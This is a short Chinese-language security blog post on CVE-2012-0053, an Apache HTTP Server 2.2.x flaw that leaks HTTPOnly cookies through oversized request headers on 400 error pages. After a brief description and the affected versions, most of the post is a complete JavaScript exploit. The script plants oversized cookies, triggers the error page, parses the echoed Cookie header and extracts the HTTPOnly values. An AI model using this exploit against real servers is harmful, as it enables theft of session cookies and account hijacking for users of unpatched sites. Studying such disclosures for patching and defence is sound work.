MENU

APACHE HTTP SERVER HTTPONLY COOKIE信息泄露漏洞

September 17, 2012 • Security

CVE-2012-0053

描述:

Apache HTTP Server 2.2.x 至 2.2.21 在建立 Bad Request (即400)错误文档时没有适当过滤请求头信息。远程攻击者可能构造页面发送含有超长(超过4K)或者含有缺陷的请求头来获取HTTPOnly Cookie的值。
受影响的Apache版本: 2.2.21- 2.2.0

现象:

    Bad Request
    Your browser sent a request that this server could not understand.
    Size of a request header field exceeds server limit.
    Cookie: z9=AAAAAAAAAAAAAAA.......

Exp:


//Source:http://gist.github.com/1955a1c28324d4724b7b/7fe51f2a66c1d4a40a736540b3ad3fde02b7fb08
// Most browsers limit cookies to 4k characters, so we need multiple
function setCookies (good) {
// Construct string for cookie value
   var str = "";
   for (var i=0; i< 819; i++) {
   str += "x";
}
// Set cookies
for (i = 0; i < 10; i++) {
// Expire evil cookie
if (good) {
   var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
}
// Set evil cookie
else {
 var cookie = "xss"+i+"="+str+";path=/";
 }
   document.cookie = cookie;
 }
}

function makeRequest() {
   setCookies();

   function parseCookies () {
   var cookie_dict = {};
// Only react on 400 status
   if (xhr.readyState === 4 && xhr.status === 400) {
// Replace newlines and match <pre> content
   var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
   if (content.length) {
// Remove Cookie: prefix
   content = content[1].replace("Cookie: ", "");
   var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
// Add cookies to object
   for (var i=0; i<cookies.length; i++) {
   var s_c = cookies[i].split('=',2);
   cookie_dict[s_c[0]] = s_c[1];
   }
 }
// Unset malicious cookies
setCookies(true);
   alert(JSON.stringify(cookie_dict));
}
}
// Make XHR request
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = parseCookies;
xhr.open("GET", "/", true);
xhr.send(null);
}
makeRequest();
Archives QR Code
QR Code for this page
Tipping QR Code